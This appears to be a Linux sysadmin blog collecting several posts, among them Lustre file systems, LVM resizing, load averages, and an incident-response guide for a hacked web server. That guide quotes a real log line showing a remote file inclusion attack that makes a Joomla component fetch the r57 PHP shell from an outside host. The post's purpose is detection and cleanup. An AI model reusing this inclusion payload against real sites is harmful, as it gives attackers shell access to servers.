To Cluster with Lustre … or not?

Recently I was tasked with investigating the feasibility of using Lustre (a clustered file system typically used in supercomputing environments) for a solution at my employer. Essentially this system requires a few high-end components to achieve considerable throughput. I’ll attempt to outline the pros and cons to using Lustre in a production environment.

image Lustre started as a cluster-aware file system originally designed by Cluster File Systems, Inc. and was recently acquired by Sun Microsystems. Lustre was designed to be a highly-scalable, high performance file system/cluster solution. The system consists of a few key components at its core.

Picking a clustering file system such as Lustre obviously has to be out of need. These systems, inherently, are more complex and can be prone to failure for that reason. Using Lustre makes sense if you’re looking for a scalable storage solution which can expand over thousands of nodes for storage. High performance must be in mind as well. Most business problems do not need a solution of this magnitude. I guess now would be a good time to cover the terminology used with Lustre.

Terminology

Lustre has some key terms we’ll need to know while reading this short paper.

  • MGS – Management Server (there is one management server per site, this server contains all configuration detail for all Lustre clusters at a site)
  • MDT – Meta Data Target (this server [or pair of servers] stores all meta data needed for where files are stored)
  • OST – Object Storage Target (this is where the data is actually stored and striped across)
  • Lustre Clients (these clients are typically *nix variants)

Now that we have the terminology out of the way I’ll describe how it works (just a high-level overview).

We’ve reviewed the components of the Lustre configuration above. A Lustre MGS stores all configuration data needed for a site. The MDT stores all the meta data needed for where the files are located (pointers to OST’s) and the OST’s have the physical storage needed for object (file) storage.

A key benefit is scalability and performance. Performance is achieved by striping data across all available OST containers. This is what makes Lustre shine. Consequently you’ll need equipment to support that level of speed.

Lustre uses its own network drivers to facilitate network communication between nodes. Currently Lustre supports TCP.IP, Elan, InfiniBand, myrinet and others.

Equipment

Here is where most decisions are made. I suppose Lustre on a 1G network would perform (granted your switching backplane is great) but it also depends on how many clients you have accessing this array of machines. It’s recommended to use a higher-speed communication medium such as 10G or InfiniBand.

The bottom line

The bottom line is very simple. If you need a system which is highly scalable, high performance and very reliable pick Lustre. Remember to gain any considerable speed you will need considerable investments in the network arena. Lustre is not a widely deployed solution in most hosting enterprises but could serve as a good storage back end solution for a cluster of web servers (since Lustre supports reading and writing the same file at the same time from different machines).

* Image provided by Cluster File Systems, Inc.

Tracking down h4X0rZ

This is a quick and dirty document on how to troubleshoot h4xed l00nix boxen.

The scenario is as follows:
Received reports from outside ISPs of an attempted DDoS attack on an IP address in their netblock. After closer investigation this machine had a few rogue processes noticed by issuing “ps auxww”. These commands were listed as “/usr/sbin/httpd” and not the full path to the normal httpd binary on that system. The ps name was forged. After catting “/proc/<pid>/status” I could see that the process running was actually perl. Luckily this particular attack was not a root-level attack. If you suspect a root-level hack please make sure to download a utility like rkhunter to perform a quick and easy scan of the entire system for possible root kits. Also make sure to download staticly-linked binaries of ls, ps, pstree, and strace if you suspect root-level hacking. Hackers usually replace these files to obfuscate their rogue processes and files.

Troubleshooting Steps:

  1. ps auxww (showing all processes)
  2. top (to analyze possible high-load processes)
  3. netstat -tupan | grep <pid> (to see if we can find out if the PID is listening)
  4. strace -p <pid> (to watch what the process is actually doing)
    socket(PF_INET, SOCK_STREAM, IPPROTO_TCP) = 3
    ioctl(3, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfffb8a8) = -1 EINVAL (Invalid
    argument)
    _llseek(3, 0, 0xbfffb8e0, SEEK_CUR)     = -1 ESPIPE (Illegal seek)
    ioctl(3, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfffb8a8) = -1 EINVAL (Invalid
    argument)
    _llseek(3, 0, 0xbfffb8e0, SEEK_CUR)     = -1 ESPIPE (Illegal seek)
    fcntl64(3, F_SETFD, FD_CLOEXEC)         = 0
    connect(3, {sa_family=AF_INET, sin_port=htons(23), sin_addr=inet_addr
    ("xxx.xxx.xxx.xxx")}, 16) = -1 ECONNREFUSED (Connection refused)
    close(3)
  5. Reading above shows that we were trying to connect outbound to “inet_addr” on port 23. This happened over and over again. This was apparently part of a DDoS. This script is not your normal script.
  6. lsof -p <pid> (this might be helpful to see what files the pid has open)
  7. cat /proc/<pid>/status to see other useful information. Also check /proc/<pid>/cwd to see if the process will give away it’s working directory.
  8. find / -gid <gid of httpd> > /root/apachefiles.txt (I suspected the file was written out from the httpd user so it’s somewhere on the file system)
  9. Download MemGrep

    Memgrep allows you to view memory addresses and view/search contents at that memory address.

    First download, compile and then make. Run memgrep as follows:

    # ./memgrep -p <pid> -L

    Then run memgrep to dump all information from the data (and even the text memory area if necessary) with this command:

    # ./memgrep -p <pid> -d -a <memory address> -l <size in bytes to dump(listed to the right of the mem address)>

    Sometimes this will yeild the hax0r’s name or type of hack.

  10. Check your httpd logs. Most common exploits for PHP scripts are automated (watch out for Mambo and Joomla components!) Most requests come from an agent called libwww-perl. Joomla and Mambo components are usually subject to remote inclusion vulnerabilities. Look for “mosConfig_absolute_path=” in your logs.

    Here’s a sample:

    xxx.xxx.xxx.xxx - - [07/Jun/2007:11:34:38 -0500] "GET /index.php?option=
    com_phpshop&page=shop.registration&option=com_phpshop&Itemid=61/component
    s/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://al
    ienr0x.by.ru/r57.txt? HTTP/1.1" 200 14130 "-" "libwww-perl/5.805"
  11. r57.txt is a phpshell script. Once they load the URI above they have access to phpshell where they can read/write/modify and delete any file with permissions for the httpd UID/GID.
  12. Rectify the situation by disabling that component and searching for an upgrade.

How to quiet Dell alarms

Just a quick note. To quiet an alarm on a controller just run the following command:

# omconfig storage controller action=quietalarm controller=<controller id>

Use this command to disable alarms all together:

# omconfig storage controller action=disablealarm controller=<controller id>

How to extract an RPM (without installing)

Most of us are familiar with RPM packages and how to install them. Sometimes it can be useful to extract the files without installing them into the RPM database. We use CPIO (a utility to copy files to and from archives) and a tool called rpm2cpio.

  1. Download/obtain the RPM you wish to extract.
  2. Make a temporary directory for your RPM extraction.
  3. Run the following command: 
    rpm2cpio wget-1.9.1-22.i386.rpm | cpio -idmv
  4. Your files are now extracted (with directory structure) in your temporary directory. The cpio flags are as follows:
    i – restore archive
    d – create any leading directories if needed
    m – retain file modification times
    v – verbose mode (display progress and folder structure)

Here’s what we see on the screen when performing the above operations:

image

image

 image

 

 

Load Average Explanation

While working with Linux many of us have noticed the Linux "Load Average" but never really put much thought into how this number is generated. Load averages are generated using many different metrics, disk load, CPU usage, memory usage and much more. The load average number is the total number of processes waiting in the run queue.

Using "top" provides insight into the system’s general health status.

The top command provides a view of the following main health statistics:

  • Uptime (including days, hours and minutes, the user count and current time and load average)
  • The total number of processes along with the number of running processes and sleeping processes
  • Memory usage including total memory, used and free memory
  • Swap memory usage (useful for troubleshooting slow systems)

The top command looks like this:

image

The topmost process on the top process list is the process using the highest percentage of CPU. The top command is available on most Unix and Linux variants.

As we’ll learn, CPU usage is not directly related to load average. Load average is an overall view of the system.

The load average rule of thumb

One quick rule of thumb I try to use (to make sure systems do not see any latency … e.g. slow processes, slow page loads, slow queries etc…) is to keep the number of waiting processes in the run queue (the load average represents total number of processes that had to wait for resources in the last 1, 5 and 15 minutes) under the total number of processors in the machine.

To check the number of processors (recognized by the Unix/Linux OS) run the following command:

cat /proc/cpuinfo | grep "processor" | wc -l

Keep in mind this command will return the total number of recognized processors. If you have a hyper-threaded P4 you’ll see two processors when really you only have one core. The same rule applies with the load average rule of thumb.

Keeping the load average under the total processor count will make for a happy, healthy and fast-responding system.

Good Luck!

/dev/null – Permission Denied

Strange enough I found a server today which had permissions set incorrectly for “/dev/null”

Here’s a fix:

ls -l /dev/null
You should see this if everything is correctly
set:
crw-rw-rw- 1 root root 1, 3

If you get a different set of permissions like
this maybe:
-rw-r–r– 1 root root 1, 3

then you should (as root) delete the /dev/null with:
rm /dev/null

and recreate it (as root) again with:
mknod -m 0666 /dev/null c 1 3

Amazingly large null file (/var/log/lastlog)

I’ve been seeing a lot of strange size reports on some Linux machines… specifically 64-bit systems.

The reason why you see a 1.2TB file full of null info is because the “nfsnobody” user is created with a userid of “-1″ which is the highest UID available. On a 32-bit system this is “65534″ but on a 64-bit system it’s a staggering “4294967294″. Lastlog pre-allocates space for every uid it obeys and counts 4.2 billion users just to accommodate for the user “nfsnobody”. It really doesn’t use _that_ much space but most backup utilities (E.G. EMC Retrospect) don’t know how to handle null/sparse files it will hang almost indefinitely when it tries to backup that file. Here’s the quick and dirty solution:

# usermod -u 65533 nfsnobody
# groupmod -g 65533 nfsnobody
# echo "" > lastlog

Happy Linuxing!

Partition Manipulation (LVM … yum.)

A while back I faced a difficult issue concerning a full partition that needed to be expanded – logical volume management was in use but there was no extra physical disk space to be partitioned. Here’s what I did… The solution/information below pertains to a CentOS/Redhack EL box. Release 4 or higher. BACK UP YOUR DATA! :-)

Real World Problem:
Server "foo" has 50KB free on /home and has no additional disks to grow to. This server has all slots full and is running RAID5.

Real World Solution:
Copy the partition to another new disk (or disk array) pop into cfdisk, create a new partition on the extra free space, grow the logical volume. Resize with ext2online. Here’s a step-by-step:

  1. Use DD or whatever disk imaging to copy the disk to the new disk
  2. Boot from the new disk
  3. Download the CFDisk RPM
  4. Download ncurses-4 and ncurses-5
  5. Install above mentioned RPM’s
    (rpm -ivh cfdisk-glibc-0.8g-1.i386.rpm; rpm –force -ivh ncurses4-5.0-12.i386.rpm; rpm –force -ivh ncurses-devel-5.4-13.i386.rpm)
  6. Run cfdisk /dev/device (probably /dev/sda or sdb .. you should know the device!)
  7. Create new partition and write changes – reboot.
  8. Create pv (pvcreate /dev/sda6) this creates the pv on sda6
  9. Add pv to volume group (vgextend VolGroup00 /dev/sda6) this
  10. vgdisplay will show volume group’s total size, now we can extend our lv
  11. Unmount the mount being used (in our case it was /home) umount /home
  12. lvextend -L+100GB /dev/mapper/VolGroup00/LogVol00-Home – This extends the current lv by 100GB
  13. Mount the partition back to it’s mountpoint (as specified in fstab) mount /home
  14. Use ext2online to grow the partition to it’s full size – yes, while it’s mounted! (ext2online /home &)
    "df -h" will show the partition growing before your eyes!
  15. Enjoy a cool beverage.

The reason for using CFDisk and not FDISK is because fdisk will not recognize the disk size change because DD copies everything – all structures – cfdisk is the only utility (at least that I found) that can resize in this type of situation.

Oracle and RHCS – Bad Idea!

A long time ago I performed an installation of an Oracle cluster. This cluster, unlike other real clusters, is a cluster using RedHat Cluster Suite (RHCS) and involved two Dell 1950’s each with 8GB RAM and two 146GB 15K SAS drives. Each of these machines are connected to a CLARiiON SAN via QLogic FC cards through a pair of MC Data FC switches.

This cluster is more of an active/active cluster but, unlike Oracle’s RAC clustering software, there are four instances running on one machine and four running on the other; effectively evening out the load. There are quite a few downsides to this method which I will outline below. There are, however, a few pro’s as well.

Pros:

  • Allows for applications not written for RAC cluster to still be used in a clustered environment for High Availability.

Cons:

  • Expensive! RHCS was needed for this setup and GFS ($2000 per node per year) was needed. This company chose to use a supported version of Linux, Cluster Suite and GFS. Of course, you can do this freely as the OS, File System and cluster utility are all freely available.
  • Not truly load balanced. This setup was meant to be load balanced but they are still two separate Oracle installations on two machines. The clustering suite just allows for proper failover.
  • RHCS (Red Hat Cluster Suite) was never made to support Oracle on both systems. Oracle’s Enterprise Manager will not start for both installations on the same Ethernet adapter. This situation would be encountered if both installations would fail over to one machine. EM is inaccessible for the databases which failed over.
  • Lots and lots of editing needed to be done to make Oracle work properly – editing the startup scripts, oratab, creating more custom startup scripts and more. In general this was a messy install.

In summary, I would not recommend using Oracle with RHCS. I would highly recommend that the application be re-written to be “RAC Compatible” so that you can fully utilize the power of Oracle load-balancing. This will save time and money in the short run and possibly the long run depending on what kind of support issues we might encounter. RHCS is great but I wouldn’t recommend it to anyone for Oracle.